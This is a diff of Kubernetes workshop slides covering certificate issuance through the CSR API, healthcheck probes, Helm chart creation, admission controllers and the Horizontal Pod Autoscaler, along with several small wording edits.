- TLS (Transport Layer Security) is a protocol providing:
|
||||
|
||||
- encryption (to prevent eavesdropping)
|
||||
|
||||
- authentication (using public key cryptography)
|
||||
|
||||
- When we access an https:// URL, the server authenticates itself
|
||||
|
||||
(it proves its identity to us; as if it were "showing its ID")
|
||||
|
||||
- But we can also have mutual TLS authentication (mTLS)
|
||||
|
||||
(client proves its identity to server; server proves its identity to client)
|
||||
|
||||
---
|
||||
|
||||
## Authentication with certificates
|
||||
|
||||
- To authenticate, someone (client or server) needs:
|
||||
|
||||
- a *private key* (that remains known only to them)
|
||||
|
||||
- a *public key* (that they can distribute)
|
||||
|
||||
- a *certificate* (associating the public key with an identity)
|
||||
|
||||
- A message encrypted with the private key can only be decrypted with the public key
|
||||
|
||||
(and vice versa)
|
||||
|
||||
- If I use someone's public key to encrypt/decrypt their messages,
|
||||
<br/>
|
||||
I can be certain that I am talking to them / they are talking to me
|
||||
|
||||
- The certificate proves that I have the correct public key for them
|
||||
|
||||
---
|
||||
|
||||
## Certificate generation workflow
|
||||
|
||||
This is what I do if I want to obtain a certificate.
|
||||
|
||||
1. Create public and private keys.
|
||||
|
||||
2. Create a Certificate Signing Request (CSR).
|
||||
|
||||
(The CSR contains the identity that I claim and a public key.)
|
||||
|
||||
3. Send that CSR to the Certificate Authority (CA).
|
||||
|
||||
4. The CA verifies that I can claim the identity in the CSR.
|
||||
|
||||
5. The CA generates my certificate and gives it to me.
|
||||
|
||||
The CA (or anyone else) never needs to know my private key.
|
||||
|
||||
---
|
||||
|
||||
## The CSR API
|
||||
|
||||
- The Kubernetes API has a CertificateSigningRequest resource type
|
||||
|
||||
(we can list them with e.g. `kubectl get csr`)
|
||||
|
||||
- We can create a CSR object
|
||||
|
||||
(= upload a CSR to the Kubernetes API)
|
||||
|
||||
- Then, using the Kubernetes API, we can approve/deny the request
|
||||
|
||||
- If we approve the request, the Kubernetes API generates a certificate
|
||||
|
||||
- The certificate gets attached to the CSR object and can be retrieved
|
||||
|
||||
---
|
||||
|
||||
## Using the CSR API
|
||||
|
||||
- We will show how to use the CSR API to obtain user certificates
|
||||
|
||||
- This will be a rather complex demo
|
||||
|
||||
- ... And yet, we will take a few shortcuts to simplify it
|
||||
|
||||
(but it will illustrate the general idea)
|
||||
|
||||
- The demo also won't be automated
|
||||
|
||||
(we would have to write extra code to make it fully functional)
|
||||
|
||||
---
|
||||
|
||||
## General idea
|
||||
|
||||
- We will create a Namespace named "users"
|
||||
|
||||
- Each user will get a ServiceAccount in that Namespace
|
||||
|
||||
- That ServiceAccount will give read/write access to *one* CSR object
|
||||
|
||||
- Users will use that ServiceAccount's token to submit a CSR
|
||||
|
||||
- We will approve the CSR (or not)
|
||||
|
||||
- Users can then retrieve their certificate from their CSR object
|
||||
|
||||
- ...And use that certificate for subsequent interactions
|
||||
|
||||
---
|
||||
|
||||
## Resource naming
|
||||
|
||||
For a user named `jean.doe`, we will have:
|
||||
|
||||
- ServiceAccount `jean.doe` in Namespace `users`
|
||||
|
||||
- CertificateSigningRequest `users:jean.doe`
|
||||
|
||||
- ClusterRole `users:jean.doe` giving read/write access to that CSR
|
||||
|
||||
- ClusterRoleBinding `users:jean.doe` binding ClusterRole and ServiceAccount
|
||||
|
||||
---
|
||||
|
||||
## Creating the user's resources
|
||||
|
||||
.warning[If you want to use another name than `jean.doe`, update the YAML file!]
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the global namespace for all users:
|
||||
```bash
|
||||
kubectl create namespace users
|
||||
```
|
||||
|
||||
- Create the ServiceAccount, ClusterRole, ClusterRoleBinding for `jean.doe`:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/users:jean.doe.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Extracting the user's token
|
||||
|
||||
- Let's obtain the user's token and give it to them
|
||||
|
||||
(the token will be their password)
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the user's secrets:
|
||||
```bash
|
||||
kubectl --namespace=users describe serviceaccount jean.doe
|
||||
```
|
||||
|
||||
- Show the user's token:
|
||||
```bash
|
||||
kubectl --namespace=users describe secret `jean.doe-token-xxxxx`
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Configure `kubectl` to use the token
|
||||
|
||||
- Let's create a new context that will use that token to access the API
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add a new identity to our kubeconfig file:
|
||||
```bash
|
||||
kubectl config set-credentials token:jean.doe --token=...
|
||||
```
|
||||
|
||||
- Add a new context using that identity:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user=token:jean.doe --cluster=kubernetes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Access the API with the token
|
||||
|
||||
- Let's check that our access rights are set properly
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to access any resource:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
(This should tell us "Forbidden")
|
||||
|
||||
- Try to access "our" CertificateSigningRequest:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe
|
||||
```
|
||||
(This should tell us "NotFound")
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Create a key and a CSR
|
||||
|
||||
- There are many tools to generate TLS keys and CSRs
|
||||
|
||||
- Let's use OpenSSL; it's not the best one, but it's installed everywhere
|
||||
|
||||
(many people prefer cfssl, easyrsa, or other tools; that's fine too!)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate the key and certificate signing request:
|
||||
```bash
|
||||
openssl req -newkey rsa:2048 -nodes -keyout key.pem \
|
||||
-new -subj /CN=jean.doe/O=devs/ -out csr.pem
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The command above generates:
|
||||
|
||||
- a 2048-bit RSA key, without encryption, stored in key.pem
|
||||
- a CSR for the name `jean.doe` in group `devs`
|
||||
|
||||
---
|
||||
|
||||
## Inside the Kubernetes CSR object
|
||||
|
||||
- The Kubernetes CSR object is a thin wrapper around the CSR PEM file
|
||||
|
||||
- The PEM file needs to be encoded to base64 on a single line
|
||||
|
||||
(we will use `base64 -w0` for that purpose)
|
||||
|
||||
- The Kubernetes CSR object also needs to list the right "usages"
|
||||
|
||||
(these are flags indicating how the certificate can be used)
|
||||
|
||||
---
|
||||
|
||||
## Sending the CSR to Kubernetes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate and create the CSR resource:
|
||||
```bash
|
||||
kubectl apply -f - <<EOF
|
||||
apiVersion: certificates.k8s.io/v1beta1
|
||||
kind: CertificateSigningRequest
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
spec:
|
||||
request: $(base64 -w0 < csr.pem)
|
||||
usages:
|
||||
- digital signature
|
||||
- key encipherment
|
||||
- client auth
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adjusting certificate expiration
|
||||
|
||||
- By default, the CSR API generates certificates valid 1 year
|
||||
|
||||
- We want to generate short-lived certificates, so we will lower that to 1 hour
|
||||
|
||||
- Fow now, this is configured [through an experimental controller manager flag](https://github.com/kubernetes/kubernetes/issues/67324)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the static pod definition for the controller manager:
|
||||
```bash
|
||||
sudo vim /etc/kubernetes/manifests/kube-controller-manager.yaml
|
||||
```
|
||||
|
||||
- In the list of flags, add the following line:
|
||||
```bash
|
||||
- --experimental-cluster-signing-duration=1h
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Verifying and approving the CSR
|
||||
|
||||
- Let's inspect the CSR, and if it is valid, approve it
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `cluster-admin`:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Inspect the CSR:
|
||||
```bash
|
||||
kubectl describe csr users:jean.doe
|
||||
```
|
||||
|
||||
- Approve it:
|
||||
```bash
|
||||
kubectl certificate approve users:jean.doe
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Obtaining the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to the user's identity:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Retrieve the updated CSR object and extract the certificate:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe \
|
||||
-o jsonpath={.status.certificate} \
|
||||
| base64 -d > cert.pem
|
||||
```
|
||||
|
||||
- Inspect the certificate:
|
||||
```bash
|
||||
openssl x509 -in cert.pem -text -noout
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the key and certificate to kubeconfig:
|
||||
```bash
|
||||
kubectl config set-credentials cert:jean.doe --embed-certs \
|
||||
--client-certificate=cert.pem --client-key=key.pem
|
||||
```
|
||||
|
||||
- Update the user's context to use the key and cert to authenticate:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user cert:jean.doe
|
||||
```
|
||||
|
||||
- Confirm that we are seen as `jean.doe` (but don't have permissions):
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's missing?
|
||||
|
||||
We have just shown, step by step, a method to issue short-lived certificates for users.
|
||||
|
||||
To be usable in real environments, we would need to add:
|
||||
|
||||
- a kubectl helper to automatically generate the CSR and obtain the cert
|
||||
|
||||
(and transparently renew the cert when needed)
|
||||
|
||||
- a Kubernetes controller to automatically validate and approve CSRs
|
||||
|
||||
(checking that the subject and groups are valid)
|
||||
|
||||
- a way for the users to know the groups to add to their CSR
|
||||
|
||||
(e.g.: annotations on their ServiceAccount + read access to the ServiceAccount)
|
||||
|
||||
---
|
||||
|
||||
## Is this realistic?
|
||||
|
||||
- Larger organizations typically integrate with their own directory
|
||||
|
||||
- The general principle, however, is the same:
|
||||
|
||||
- users have long-term credentials (password, token, ...)
|
||||
|
||||
- they use these credentials to obtain other, short-lived credentials
|
||||
|
||||
- This provides enhanced security:
|
||||
|
||||
- the long-term credentials can use long passphrases, 2FA, HSM...
|
||||
|
||||
- the short-term credentials are more convenient to use
|
||||
|
||||
- we get strong security *and* convenience
|
||||
|
||||
- Systems like Vault also have certificate issuance mechanisms
|
||||
@@ -38,7 +38,7 @@
|
||||
|
||||
<!-- ##VERSION## -->
|
||||
|
||||
- Unfortunately, as of Kubernetes 1.15, the CLI cannot create daemon sets
|
||||
- Unfortunately, as of Kubernetes 1.14, the CLI cannot create daemon sets
|
||||
|
||||
--
|
||||
|
||||
@@ -371,7 +371,7 @@ But ... why do these pods (in particular, the *new* ones) have this `app=rng` la
|
||||
|
||||
- Bottom line: if we remove our `app=rng` label ...
|
||||
|
||||
... The pod "disappears" for its parent, which re-creates another pod to replace it
|
||||
... The pod "diseappears" for its parent, which re-creates another pod to replace it
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -153,7 +153,5 @@ The dashboard will then ask you which authentication you want to use.
|
||||
|
||||
--
|
||||
|
||||
- It introduces new failure modes
|
||||
|
||||
(for instance, if you try to apply YAML from a link that's no longer valid)
|
||||
- It introduces new failure modes (like if you try to apply yaml from a link that's no longer valid)
|
||||
|
||||
|
||||
@@ -1,67 +0,0 @@
|
||||
## 19,000 words
|
||||
|
||||
They say, "a picture is worth one thousand words."
|
||||
|
||||
The following 19 slides show what really happens when we run:
|
||||
|
||||
```bash
|
||||
kubectl run web --image=nginx --replicas=3
|
||||
```
|
||||
|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
@@ -175,7 +175,7 @@ Success!
|
||||
|
||||
]
|
||||
|
||||
We should get `No resources found.` and the `kubernetes` service, respectively.
|
||||
So far, so good.
|
||||
|
||||
Note: the API server automatically created the `kubernetes` service entry.
|
||||
|
||||
@@ -225,7 +225,7 @@ Success?
|
||||
|
||||
]
|
||||
|
||||
Our Deployment is in bad shape:
|
||||
Our Deployment is in a bad shape:
|
||||
```
|
||||
NAME READY UP-TO-DATE AVAILABLE AGE
|
||||
deployment.apps/web 0/1 0 0 2m26s
|
||||
@@ -584,7 +584,7 @@ Our pod is still `Pending`. 🤔
|
||||
|
||||
Which is normal: it needs to be *scheduled*.
|
||||
|
||||
(i.e., something needs to decide which node it should go on.)
|
||||
(i.e., something needs to decide on which node it should go.)
|
||||
|
||||
---
|
||||
|
||||
@@ -658,7 +658,7 @@ class: extra-details
|
||||
|
||||
- This is actually how the scheduler works!
|
||||
|
||||
- It watches pods, makes scheduling decisions, and creates Binding objects
|
||||
- It watches pods, takes scheduling decisions, creates Binding objects
|
||||
|
||||
---
|
||||
|
||||
@@ -686,7 +686,7 @@ We should see the `Welcome to nginx!` page.
|
||||
|
||||
## Exposing our Deployment
|
||||
|
||||
- We can now create a Service associated with this Deployment
|
||||
- We can now create a Service associated to this Deployment
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -711,11 +711,11 @@ This won't work. We need kube-proxy to enable internal communication.
|
||||
|
||||
## Starting kube-proxy
|
||||
|
||||
- kube-proxy also needs to connect to the API server
|
||||
- kube-proxy also needs to connect to API server
|
||||
|
||||
- It can work with the `--master` flag
|
||||
|
||||
(although that will be deprecated in the future)
|
||||
(even though that will be deprecated in the future)
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -832,6 +832,6 @@ class: extra-details
|
||||
|
||||
- By default, the API server expects to be running directly on the nodes
|
||||
|
||||
(it could be as a bare process, or in a container/pod using the host network)
|
||||
(it could be as a bare process, or in a container/pod using host network)
|
||||
|
||||
- ... And it expects to be listening on port 6443 with TLS
|
||||
|
||||
@@ -61,7 +61,7 @@ There are many possibilities!
|
||||
|
||||
- creates a new custom type, `Remote`, exposing a git+ssh server
|
||||
|
||||
- deploy by pushing YAML or Helm charts to that remote
|
||||
- deploy by pushing YAML or Helm Charts to that remote
|
||||
|
||||
- Replacing built-in types with CRDs
|
||||
|
||||
@@ -87,11 +87,7 @@ There are many possibilities!
|
||||
|
||||
(and take action when they are created/updated)
|
||||
|
||||
*
|
||||
Examples:
|
||||
[YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml),
|
||||
[YAML to install a redis operator CRD](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml)
|
||||
*
|
||||
*Example: [YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml)*
|
||||
|
||||
---
|
||||
|
||||
@@ -117,7 +113,7 @@ Examples:
|
||||
|
||||
## Admission controllers
|
||||
|
||||
- When a Pod is created, it is associated with a ServiceAccount
|
||||
- When a Pod is created, it is associated to a ServiceAccount
|
||||
|
||||
(even if we did not specify one explicitly)
|
||||
|
||||
@@ -163,7 +159,7 @@ class: pic
|
||||
|
||||
- These webhooks can be *validating* or *mutating*
|
||||
|
||||
- Webhooks can be set up dynamically (without restarting the API server)
|
||||
- Webhooks can be setup dynamically (without restarting the API server)
|
||||
|
||||
- To setup a dynamic admission webhook, we create a special resource:
|
||||
|
||||
@@ -171,7 +167,7 @@ class: pic
|
||||
|
||||
- These resources are created and managed like other resources
|
||||
|
||||
(i.e. `kubectl create`, `kubectl get`...)
|
||||
(i.e. `kubectl create`, `kubectl get` ...)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -234,6 +234,6 @@
|
||||
|
||||
(see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)
|
||||
|
||||
- Gitkube can also deploy Helm charts
|
||||
- Gitkube can also deploy Helm Charts
|
||||
|
||||
(instead of raw YAML files)
|
||||
|
||||
@@ -1,393 +0,0 @@
|
||||
## Questions to ask before adding healthchecks
|
||||
|
||||
- Do we want liveness, readiness, both?
|
||||
|
||||
(sometimes, we can use the same check, but with different failure thresholds)
|
||||
|
||||
- Do we have existing HTTP endpoints that we can use?
|
||||
|
||||
- Do we need to add new endpoints, or perhaps use something else?
|
||||
|
||||
- Are our healthchecks likely to use resources and/or slow down the app?
|
||||
|
||||
- Do they depend on additional services?
|
||||
|
||||
(this can be particularly tricky, see next slide)
|
||||
|
||||
---
|
||||
|
||||
## Healthchecks and dependencies
|
||||
|
||||
- A good healthcheck should always indicate the health of the service itself
|
||||
|
||||
- It should not be affected by the state of the service's dependencies
|
||||
|
||||
- Example: a web server requiring a database connection to operate
|
||||
|
||||
(make sure that the healthcheck can report "OK" even if the database is down;
|
||||
<br/>
|
||||
because it won't help us to restart the web server if the issue is with the DB!)
|
||||
|
||||
- Example: a microservice calling other microservices
|
||||
|
||||
- Example: a worker process
|
||||
|
||||
(these will generally require minor code changes to report health)
|
||||
|
||||
---
|
||||
|
||||
## Adding healthchecks to an app
|
||||
|
||||
- Let's add healthchecks to DockerCoins!
|
||||
|
||||
- We will examine the questions of the previous slide
|
||||
|
||||
- Then we will review each component individually to add healthchecks
|
||||
|
||||
---
|
||||
|
||||
## Liveness, readiness, or both?
|
||||
|
||||
- To answer that question, we need to see the app run for a while
|
||||
|
||||
- Do we get temporary, recoverable glitches?
|
||||
|
||||
→ then use readiness
|
||||
|
||||
- Or do we get hard lock-ups requiring a restart?
|
||||
|
||||
→ then use liveness
|
||||
|
||||
- In the case of DockerCoins, we don't know yet!
|
||||
|
||||
- Let's pick liveness
|
||||
|
||||
---
|
||||
|
||||
## Do we have HTTP endpoints that we can use?
|
||||
|
||||
- Each of the 3 web services (hasher, rng, webui) has a trivial route on `/`
|
||||
|
||||
- These routes:
|
||||
|
||||
- don't seem to perform anything complex or expensive
|
||||
|
||||
- don't seem to call other services
|
||||
|
||||
- Perfect!
|
||||
|
||||
(See next slides for individual details)
|
||||
|
||||
---
|
||||
|
||||
- [hasher.rb](https://github.com/jpetazzo/container.training/blob/master/dockercoins/hasher/hasher.rb)
|
||||
```ruby
|
||||
get '/' do
|
||||
"HASHER running on #{Socket.gethostname}\n"
|
||||
end
|
||||
```
|
||||
|
||||
- [rng.py](https://github.com/jpetazzo/container.training/blob/master/dockercoins/rng/rng.py)
|
||||
```python
|
||||
@app.route("/")
|
||||
def index():
|
||||
return "RNG running on {}\n".format(hostname)
|
||||
```
|
||||
|
||||
- [webui.js](https://github.com/jpetazzo/container.training/blob/master/dockercoins/webui/webui.js)
|
||||
```javascript
|
||||
app.get('/', function (req, res) {
|
||||
res.redirect('/index.html');
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Running DockerCoins
|
||||
|
||||
- We will run DockerCoins in a new, separate namespace
|
||||
|
||||
- We will use a set of YAML manifests and pre-built images
|
||||
|
||||
- We will add our new liveness probe to the YAML of the `rng` DaemonSet
|
||||
|
||||
- Then, we will deploy the application
|
||||
|
||||
---
|
||||
|
||||
## Creating a new namespace
|
||||
|
||||
- This will make sure that we don't collide / conflict with previous exercises
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the yellow namespace:
|
||||
```bash
|
||||
kubectl create namespace yellow
|
||||
```
|
||||
|
||||
- Switch to that namespace:
|
||||
```bash
|
||||
kns yellow
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Retrieving DockerCoins manifests
|
||||
|
||||
- All the manifests that we need are on a convenient repository:
|
||||
|
||||
https://github.com/jpetazzo/kubercoins
|
||||
|
||||
.exercise[
|
||||
|
||||
- Clone that repository:
|
||||
```bash
|
||||
cd ~
|
||||
git clone https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
|
||||
- Change directory to the repository:
|
||||
```bash
|
||||
cd kubercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## A simple HTTP liveness probe
|
||||
|
||||
This is what our liveness probe should look like:
|
||||
|
||||
```yaml
|
||||
containers:
|
||||
- name: ...
|
||||
image: ...
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /
|
||||
port: 80
|
||||
initialDelaySeconds: 30
|
||||
periodSeconds: 5
|
||||
```
|
||||
|
||||
This will give 30 seconds to the service to start. (Way more than necessary!)
|
||||
<br/>
|
||||
It will run the probe every 5 seconds.
|
||||
<br/>
|
||||
It will use the default timeout (1 second).
|
||||
<br/>
|
||||
It will use the default failure threshold (3 failed attempts = dead).
|
||||
<br/>
|
||||
It will use the default success threshold (1 successful attempt = alive).
|
||||
|
||||
---
|
||||
|
||||
## Adding the liveness probe
|
||||
|
||||
- Let's add the liveness probe, then deploy DockerCoins
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit `rng-daemonset.yaml` and add the liveness probe
|
||||
```bash
|
||||
vim rng-daemonset.yaml
|
||||
```
|
||||
|
||||
- Load the YAML for all the resources of DockerCoins:
|
||||
```bash
|
||||
kubectl apply -f .
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing the liveness probe
|
||||
|
||||
- The rng service needs 100ms to process a request
|
||||
|
||||
(because it is single-threaded and sleeps 0.1s in each request)
|
||||
|
||||
- The probe timeout is set to 1 second
|
||||
|
||||
- If we send more than 10 requests per second per backend, it will break
|
||||
|
||||
- Let's generate traffic and see what happens!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Get the ClusterIP address of the rng service:
|
||||
```bash
|
||||
kubectl get svc rng
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Monitoring the rng service
|
||||
|
||||
- Each command below will show us what's happening on a different level
|
||||
|
||||
.exercise[
|
||||
|
||||
- In one window, monitor cluster events:
|
||||
```bash
|
||||
kubectl get events -w
|
||||
```
|
||||
|
||||
- In another window, monitor the response time of rng:
|
||||
```bash
|
||||
httping `<ClusterIP>`
|
||||
```
|
||||
|
||||
- In another window, monitor pods status:
|
||||
```bash
|
||||
kubectl get pods -w
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Generating traffic
|
||||
|
||||
- Let's use `ab` to send concurrent requests to rng
|
||||
|
||||
.exercise[
|
||||
|
||||
- In yet another window, generate traffic:
|
||||
```bash
|
||||
ab -c 10 -n 1000 http://`<ClusterIP>`/1
|
||||
```
|
||||
|
||||
- Experiment with higher values of `-c` and see what happens
|
||||
|
||||
]
|
||||
|
||||
- The `-c` parameter indicates the number of concurrent requests
|
||||
|
||||
- The final `/1` is important to generate actual traffic
|
||||
|
||||
(otherwise we would use the ping endpoint, which doesn't sleep 0.1s per request)
|
||||
|
||||
---
|
||||
|
||||
## Discussion
|
||||
|
||||
- Above a given threshold, the liveness probe starts failing
|
||||
|
||||
(about 10 concurrent requests per backend should be plenty enough)
|
||||
|
||||
- When the liveness probe fails 3 times in a row, the container is restarted
|
||||
|
||||
- During the restart, there is *less* capacity available
|
||||
|
||||
- ... Meaning that the other backends are likely to timeout as well
|
||||
|
||||
- ... Eventually causing all backends to be restarted
|
||||
|
||||
- ... And each fresh backend gets restarted, too
|
||||
|
||||
- This goes on until the load goes down, or we add capacity
|
||||
|
||||
*This wouldn't be a good healthcheck in a real application!*
|
||||
|
||||
---
|
||||
|
||||
## Better healthchecks
|
||||
|
||||
- We need to make sure that the healthcheck doesn't trip when
|
||||
performance degrades due to external pressure
|
||||
|
||||
- Using a readiness check would have fewer effects
|
||||
|
||||
(but it would still be an imperfect solution)
|
||||
|
||||
- A possible combination:
|
||||
|
||||
- readiness check with a short timeout / low failure threshold
|
||||
|
||||
- liveness check with a longer timeout / higher failure threshold
|
||||
|
||||
---
|
||||
|
||||
## Healthchecks for redis
|
||||
|
||||
- A liveness probe is enough
|
||||
|
||||
(it's not useful to remove a backend from rotation when it's the only one)
|
||||
|
||||
- We could use an exec probe running `redis-cli ping`
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Exec probes and zombies
|
||||
|
||||
- When using exec probes, we should make sure that we have a *zombie reaper*
|
||||
|
||||
🤔🧐🧟 Wait, what?
|
||||
|
||||
- When a process terminates, its parent must call `wait()`/`waitpid()`
|
||||
|
||||
(this is how the parent process retrieves the child's exit status)
|
||||
|
||||
- In the meantime, the process is in *zombie* state
|
||||
|
||||
(the process state will show as `Z` in `ps`, `top` ...)
|
||||
|
||||
- When a process is killed, its children are *orphaned* and attached to PID 1
|
||||
|
||||
- PID 1 has the responsibility of *reaping* these processes when they terminate
|
||||
|
||||
- OK, but how does that affect us?
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## PID 1 in containers
|
||||
|
||||
- On ordinary systems, PID 1 (`/sbin/init`) has logic to reap processes
|
||||
|
||||
- In containers, PID 1 is typically our application process
|
||||
|
||||
(e.g. Apache, the JVM, NGINX, Redis ...)
|
||||
|
||||
- These *do not* take care of reaping orphans
|
||||
|
||||
- If we use exec probes, we need to add a process reaper
|
||||
|
||||
- We can add [tini](https://github.com/krallin/tini) to our images
|
||||
|
||||
- Or [share the PID namespace between containers of a pod](https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/)
|
||||
|
||||
(and have gcr.io/pause take care of the reaping)
|
||||
|
||||
---
|
||||
|
||||
## Healthchecks for worker
|
||||
|
||||
- Readiness isn't useful
|
||||
|
||||
(because worker isn't a backend for a service)
|
||||
|
||||
- Liveness may help us restart a broken worker, but how can we check it?
|
||||
|
||||
- Embedding an HTTP server is an option
|
||||
|
||||
(but it has a high potential for unwanted side effects and false positives)
|
||||
|
||||
- Using a "lease" file can be relatively easy:
|
||||
|
||||
- touch a file during each iteration of the main loop
|
||||
|
||||
- check the timestamp of that file from an exec probe
|
||||
|
||||
- Writing logs (and checking them from the probe) also works
|
||||
@@ -108,7 +108,7 @@
|
||||
|
||||
(as opposed to merely started)
|
||||
|
||||
- Containers in a broken state get killed and restarted
|
||||
- Containers in a broken state gets killed and restarted
|
||||
|
||||
(instead of serving errors or timeouts)
|
||||
|
||||
@@ -120,7 +120,7 @@
|
||||
|
||||
## Example: HTTP probe
|
||||
|
||||
Here is a pod template for the `rng` web service of our DockerCoins sample app:
|
||||
Here is a pod template for the `rng` web service of the DockerCoins app:
|
||||
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
|
||||
@@ -158,7 +158,7 @@ Where do these `--set` options come from?
|
||||
|
||||
]
|
||||
|
||||
The chart's metadata includes a URL to the project's home page.
|
||||
The chart's metadata includes an URL to the project's home page.
|
||||
|
||||
(Sometimes it conveniently points to the documentation for the chart.)
|
||||
|
||||
@@ -176,3 +176,77 @@ The chart's metadata includes a URL to the project's home page.
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Creating a chart
|
||||
|
||||
- We are going to show a way to create a *very simplified* chart
|
||||
|
||||
- In a real chart, *lots of things* would be templatized
|
||||
|
||||
(Resource names, service types, number of replicas...)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a sample chart:
|
||||
```bash
|
||||
helm create dockercoins
|
||||
```
|
||||
|
||||
- Move away the sample templates and create an empty template directory:
|
||||
```bash
|
||||
mv dockercoins/templates dockercoins/default-templates
|
||||
mkdir dockercoins/templates
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Exporting the YAML for our application
|
||||
|
||||
- The following section assumes that DockerCoins is currently running
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create one YAML file for each resource that we need:
|
||||
.small[
|
||||
```bash
|
||||
|
||||
while read kind name; do
|
||||
kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
|
||||
done <<EOF
|
||||
deployment worker
|
||||
deployment hasher
|
||||
daemonset rng
|
||||
deployment webui
|
||||
deployment redis
|
||||
service hasher
|
||||
service rng
|
||||
service webui
|
||||
service redis
|
||||
EOF
|
||||
```
|
||||
]
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing our helm chart
|
||||
|
||||
.exercise[
|
||||
|
||||
- Let's install our helm chart! (`dockercoins` is the path to the chart)
|
||||
```
|
||||
helm install dockercoins
|
||||
```
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
- Since the application is already deployed, this will fail:<br>
|
||||
`Error: release loitering-otter failed: services "hasher" already exists`
|
||||
|
||||
- To avoid naming conflicts, we will deploy the application in another *namespace*
|
||||
|
||||
@@ -1,238 +0,0 @@
|
||||
# The Horizontal Pod Autoscaler
|
||||
|
||||
- What is the Horizontal Pod Autoscaler, or HPA?
|
||||
|
||||
- It is a controller that can perform *horizontal* scaling automatically
|
||||
|
||||
- Horizontal scaling = changing the number of replicas
|
||||
|
||||
(adding/removing pods)
|
||||
|
||||
- Vertical scaling = changing the size of individual replicas
|
||||
|
||||
(increasing/reducing CPU and RAM per pod)
|
||||
|
||||
- Cluster scaling = changing the size of the cluster
|
||||
|
||||
(adding/removing nodes)
|
||||
|
||||
---
|
||||
|
||||
## Principle of operation
|
||||
|
||||
- Each HPA resource (or "policy") specifies:
|
||||
|
||||
- which object to monitor and scale (e.g. a Deployment, ReplicaSet...)
|
||||
|
||||
- min/max scaling ranges (the max is a safety limit!)
|
||||
|
||||
- a target resource usage (e.g. the default is CPU=80%)
|
||||
|
||||
- The HPA continuously monitors the CPU usage for the related object
